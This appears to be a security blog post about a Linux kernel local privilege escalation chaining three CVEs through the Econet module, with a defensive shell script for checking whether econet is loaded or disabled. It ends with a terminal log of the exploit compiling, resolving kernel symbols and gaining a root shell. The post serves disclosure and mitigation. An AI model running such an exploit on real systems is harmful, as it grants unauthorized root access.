A new local privilege escalation has been discovered in the Linux kernel, as reported on the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems

The Econet protocol (CVE-2010-3849) is not supported by default on Red Hat-like distributions (RHEL, CentOS and Fedora), and the major distributions have already patched CVE-2010-3849 and CVE-2010-3850, so up-to-date systems should not be affected by this particular exploit.
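Since the published exploit depends on the Econet module being loaded or autoloadable, the first thing to check on a host is whether econet is present and whether its autoload is disabled. The following script is an added example written for this post, not code from the original report or the exploit author; it parses a /proc/modules-style listing and a modprobe.d-style configuration (the "install econet /bin/true" and "blacklist econet" forms), and the sample inputs in the usage section are constructed.

```shell
#!/bin/sh
# Added example: check whether the econet kernel module is loaded and
# whether its autoload is disabled. Not part of the original post.

# Return 0 if "econet" appears as a loaded module in a /proc/modules-style
# listing read from stdin (module name is the first field).
econet_loaded() {
    awk '$1 == "econet" { found = 1 } END { exit !found }'
}

# Return 0 if a modprobe.d-style configuration read from stdin disables
# econet autoload, either via "install econet /bin/true" or "blacklist econet".
econet_blocked() {
    awk '$1 == "install" && $2 == "econet" { blocked = 1 }
         $1 == "blacklist" && $2 == "econet" { blocked = 1 }
         END { exit !blocked }'
}

# Live check against the running system (only meaningful on Linux).
check_live() {
    if [ -r /proc/modules ] && econet_loaded < /proc/modules; then
        echo "econet module is loaded"
    else
        echo "econet module is not loaded"
    fi
    if cat /etc/modprobe.d/*.conf 2>/dev/null | econet_blocked; then
        echo "econet autoload is disabled in /etc/modprobe.d"
    else
        echo "econet autoload is not disabled (consider: install econet /bin/true)"
    fi
}

# Usage on constructed sample data (not real system output):
#   printf 'econet 12345 0 - Live 0xe08b7000\n' | econet_loaded && echo loaded
#   printf 'install econet /bin/true\n' | econet_blocked && echo blocked
# Run check_live on a real host to inspect the running kernel.
```

A module that is neither built nor loadable cannot be reached by the Econet trigger, but note that the post's main point stands: CVE-2010-4258 is unpatched, so disabling econet only removes this one path to it.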

CVE-2010-4258 is the main vulnerability, and it is still unpatched; someone could find another way to trigger it.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo
msk@ubuntu:~/exploit$ ./foo 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe08b72a0
 [+] Resolved econet_ops to 0xe08b73a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
#